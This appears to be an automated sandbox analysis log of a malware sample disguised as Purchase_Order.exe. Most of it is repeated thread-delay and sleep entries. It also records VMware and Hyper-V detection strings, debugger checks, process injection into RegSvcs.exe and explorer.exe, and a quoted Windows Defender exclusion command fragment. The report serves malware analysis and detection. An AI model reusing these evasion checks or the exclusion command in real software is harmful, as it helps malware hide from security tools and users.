            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 238750
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 238641
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 238516
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 238406
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 238297
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 238188
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 238063
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 237953
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 237828
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 237719
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 237563
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 237453
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 237344
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 237219
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 237110
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 236953
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 236844
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 236735
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 236610
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 236469
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 236360
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 236203
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 236094
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 235985
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 235860
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 235735
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 235610
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 235485
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 235360
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 235235
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 235110
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 234953
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 234828
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 234703
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 234594
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 234453
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 234313
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 234188
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 234047
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 233906
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 233781
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 233641
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 233516
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 233375
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 233266
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 233141
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 233016
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 232906
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 232797
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 232688
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 232563
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 232438
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 232313
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 232203
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 232078
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 231953
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 231828
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 231719
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 231594
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 231469
            Source: C:\Users\user\Desktop\Purchase_Order.exeWindow / User API: threadDelayed 2691
            Source: C:\Users\user\Desktop\Purchase_Order.exeWindow / User API: threadDelayed 5275
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -240000s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -239844s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -239656s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -239531s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -239422s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -239313s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -239188s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -239000s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -238891s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -238750s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -238641s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -238516s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -238406s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -238297s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -238188s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -238063s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -237953s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -237828s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -237719s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -237563s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -237453s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -237344s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -237219s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -237110s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -236953s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -236844s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -236735s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -236610s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -236469s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -236360s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -236203s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -236094s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -235985s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -235860s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -235735s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -235610s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -235485s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -235360s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -235235s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -235110s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -234953s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -234828s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -234703s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -234594s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -234453s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -234313s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -234188s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -234047s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -233906s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -233781s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -233641s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -233516s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -233375s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -233266s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -233141s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -233016s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -232906s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -232797s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -232688s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -232563s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -232438s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -232313s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -232203s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -232078s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -231953s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5376Thread sleep time: -101499s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -231828s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -231719s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -231594s >= -30000s
            Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500Thread sleep time: -231469s >= -30000s
            Source: C:\Windows\explorer.exe TID: 4772Thread sleep time: -45000s >= -30000s
            Source: C:\Windows\SysWOW64\systray.exe TID: 4580Thread sleep time: -44000s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 240000
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 239844
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 239656
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 239531
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 239422
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 239313
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 239188
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 239000
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 238891
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 238750
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 238641
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 238516
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 238406
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 238297
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 238188
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 238063
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 237953
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 237828
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 237719
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 237563
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 237453
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 237344
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 237219
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 237110
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 236953
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 236844
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 236735
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 236610
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 236469
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 236360
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 236203
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 236094
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 235985
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 235860
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 235735
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 235610
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 235485
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 235360
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 235235
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 235110
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 234953
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 234828
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 234703
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 234594
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 234453
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 234313
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 234188
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 234047
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 233906
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 233781
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 233641
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 233516
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 233375
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 233266
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 233141
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 233016
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 232906
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 232797
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 232688
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 232563
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 232438
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 232313
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 232203
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 232078
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 231953
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 101499
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 231828
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 231719
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 231594
            Source: C:\Users\user\Desktop\Purchase_Order.exeThread delayed: delay time: 231469
            Source: explorer.exe, 00000007.00000000.287460148.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
            Source: explorer.exe, 00000007.00000000.287460148.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000007.00000000.288044675.0000000008CC6000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.311478350.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: explorer.exe, 00000007.00000000.287675555.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpBinary or memory string: VMWARE
            Source: explorer.exe, 00000007.00000000.287548556.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000007.00000000.311478350.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
            Source: explorer.exe, 00000007.00000000.288076974.0000000008CEA000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.287675555.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000007.00000000.278193796.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.263912988.0000000000F73000.00000004.00000020.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000007.00000000.287675555.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
            Source: explorer.exe, 00000007.00000000.287548556.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
            Source: explorer.exe, 00000007.00000000.282879554.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
            Source: explorer.exe, 00000007.00000000.311478350.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000007.00000000.311478350.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\Purchase_Order.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004088B0 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00409B20 LdrLoadDll,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01294120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01294120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01294120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01294120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01294120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01279100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01279100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01279100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F51BE mov eax, dword ptr fs:[00000030h]
